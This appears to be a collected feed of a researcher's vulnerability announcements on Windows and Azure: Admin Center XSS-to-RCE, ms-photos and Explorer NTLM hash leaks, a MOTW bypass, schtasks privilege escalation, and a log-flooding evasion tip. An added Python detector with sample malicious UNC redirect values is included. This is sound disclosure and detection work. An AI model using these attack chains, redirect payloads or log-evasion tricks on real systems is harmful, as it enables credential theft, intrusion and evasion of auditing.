New XSS2RCE in Azure Windows Admin Center!
I am happy to share our latest findings, CVE-2026-32196, a critical unauthenticated vulnerability allowing one-click remote code execution.
An attacker can craft a malicious legitimate gateway URL that, when visited by a privileged Azure admin, triggers a response-based XSS in WAC’s error handling.
This results in JavaScript execution under the WAC origin, which translates to arbitrary PowerShell execution on every managed server the victim has access to (no credentials required).
On on-premises deployments, the same chain allows theft of Azure access and refresh tokens from local storage, enabling full tenant impersonation and lateral movement into EntraID and Azure.
Full blog:
https://t.co/wt6MV0qFY1
That is exactly the Microsoft (@msftsecresponse) silent patch, which isn't enough and came without a proper CVE.
Instead of a single "open photos" prompt, they added another one asking if the server is trusted.
I am now working on reporting it to @googlechrome, @firefox and @brave to understand what steps they will take to patch it, since when a browser allows such behaviour it exposes users to CWE-939 (Improper Authorization in Handler for Custom URL Scheme) and CWE-668 (Exposure of Resource to Wrong Sphere) vulnerabilities.
I will write a new blog post to publish their response.
I found a new one click NTLM leakage vulnerability / technique from a browser.
A web server can redirect a client to a ms-photos URI handler followed by a fileName parameter. If the parameter value is a UNC path instead of a local path, photos.exe will leak the client’s NTLMv2-SSP hash, enabling relay attacks or offline cracking.
Leaking hashes from URI handlers is not new, but combined with a browser redirection, it allows moving from website infection to capturing NTLMv2-SSP hashes (supply-chain attack).
No LLMNR is required, and unless the firewall blocks outbound SMB, the hash will leak to public-facing SMB servers.
The vulnerability can be combined in a supply-chain attack by infecting public-facing applications.
MSRC will not release a patch for this issue.
Find more details with a POC here:
https://t.co/2gMKtGZfQt
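The chain described above is a server-side redirect whose target is a custom URI scheme carrying a UNC path, so the cheapest place to spot it is in web proxy or response logs before the handler ever runs. The following detector is an added example written for this page; it is not the author's PoC and not Microsoft's code. It assumes a simple constructed log format ("<status> <url> Location: <target>"), assumes the `ms-photos:viewer?fileName=...` URI layout (only the scheme and the `fileName` parameter are taken from the post), and uses documentation addresses for the UNC hosts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Custom URI schemes that hand a file path to a native application.
# "ms-photos" is the handler named in the post; the set itself is an
# assumption and should be extended with other path-taking handlers.
HANDLER_SCHEMES = {"ms-photos"}

# Query parameters the handler forwards as a file path. "fileName" is the
# parameter named in the post; matching is case-insensitive.
PATH_PARAMS = {"filename"}

# A UNC path: \\host\share\... (also the forward-slash form //host/share/...)
UNC_RE = re.compile(r"^(?:\\\\|//)(?P<host>[^\\/]+)[\\/]")

# Constructed log format (assumption): "<status> <requested url> Location: <target>"
LOG_RE = re.compile(r"^(?P<status>\d{3}) (?P<url>\S+) Location: (?P<location>\S+)$")


def unc_host(path):
    """Return the host part of a UNC path, or None if the path is not UNC."""
    m = UNC_RE.match(path)
    return m.group("host") if m else None


def analyse_location(location):
    """Inspect one redirect target.

    Returns a finding dict when the target uses a path-taking custom scheme and
    its path parameter is a UNC path (the shape that makes the handler open an
    SMB connection to an attacker-chosen host); otherwise None.
    """
    parts = urlsplit(location)
    if parts.scheme.lower() not in HANDLER_SCHEMES:
        return None
    # parse_qs percent-decodes values, so %5C%5C becomes \\ here.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() not in PATH_PARAMS:
            continue
        for value in values:
            host = unc_host(value)
            if host is not None:
                return {"scheme": parts.scheme.lower(), "param": name,
                        "path": value, "unc_host": host}
    return None


def scan_redirect_log(lines):
    """Scan response log lines; return one finding per suspicious 3xx redirect."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not m.group("status").startswith("3"):
            continue
        finding = analyse_location(m.group("location"))
        if finding:
            finding["request"] = m.group("url")
            findings.append(finding)
    return findings


# Constructed sample: a benign redirect, a handler redirect with a local path
# (no SMB trigger), and two UNC variants. 203.0.113.7 is a documentation address.
SAMPLE_LOG = [
    "302 https://example.test/promo Location: https://example.test/landing",
    "302 https://example.test/img Location: ms-photos:viewer?fileName=C%3A%5CUsers%5CPublic%5Cpic.jpg",
    "302 https://example.test/pic Location: ms-photos:viewer?fileName=%5C%5C203.0.113.7%5Cshare%5Cpic.jpg",
    "302 https://example.test/alt Location: ms-photos:viewer?filename=//203.0.113.7/share/pic.jpg",
]

if __name__ == "__main__":
    for f in scan_redirect_log(SAMPLE_LOG):
        print(f"{f['request']} -> {f['scheme']}: {f['param']}={f['path']} (SMB to {f['unc_host']})")
```

Run as written, the local-path redirect is deliberately not reported: the point of the post is the UNC value, and a handler opening a local file is ordinary behaviour. Redirects issued through `<meta http-equiv="refresh">` or JavaScript `location=` never appear in a Location header, so a body-level check is needed to cover those.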
Is Web3 the new C2?
Read my blog about EtherHiding, an emerging method that abuses public blockchains as malware infrastructures by embedding payloads into smart contracts.
It provides attackers with decentralized payloads evading takedown & defense.
https://t.co/u5NzaqpA4h
@davidnaliay Thank you!
Interesting try, but it contradicts the term “local link” in LLMNR. The RFC 4695 itself (see 2.6/b) says:
“If an IPv4 address is returned, it MUST be reachable through the link over which LLMNR is used.”
On intranet also, Microsoft Word remote templates containing macros are blocked by MOTW.
I found a way to bypass it using LLMNR poisoning.
Not my greatest finding but useful for phishing assessment.
MSRC didn’t recognise it.
Details and POC:
https://t.co/hgNFSW2evc
Microsoft's patch for our last report, CVE-2025-50154, completely failed and the vulnerability remained unfixed.
Thanks to @0patch for the quick finding and report!
We reported this serious oversight, now tracked as CVE-2025-59214.
Full details: https://t.co/5eO72lAu6B
@lapinousexy Yeah, but they thought they fixed it with CVE-2025-24054, but in fact they didn’t! That’s exactly why I reported it.
Thank you for the precision!
Find the POC for my new finding, CVE-2025-50154, a zero-day vulnerability in Windows File Explorer disclosing NTLMv2-SSP without user interaction. It is a bypass for the CVE-2025-24054 security patch.
https://t.co/JKA8zuyYnl
@lapinousexy Yes it is precisely!
With CVE-2025-24054 patch, I thought that what you sent shouldn’t work anymore. But in fact it does.
The reason is that Microsoft's patch didn't focus on the target path value but on the icon path value, blocking UNC paths only there.
You didn’t click, but your password challenge is leaked.
I’m excited to share my latest research: CVE-2025-50154, a high severity NTLM hash disclosure vulnerability in the explorer.exe process, exploitable without any user interaction.
https://t.co/ssA9YdBE6J
@fortraofficial The impacket-atexec script can be updated to run commands and overflow the whole content of the 4698 "task created" log, making the command and argument logs unwritable.
Also, logs and task metadata poisoning work remotely using the same method!
🔥 One task away from total takeover?
4 local privilege escalation flaws found in schtasks.exe—a core part of Windows Task Scheduler.
Attackers can:
• Bypass UAC
• Run SYSTEM-level commands
• Erase security logs
• Impersonate admins using known passwords.
Fix not yet available.
🔗 Full story → https://t.co/F2zZw80wWA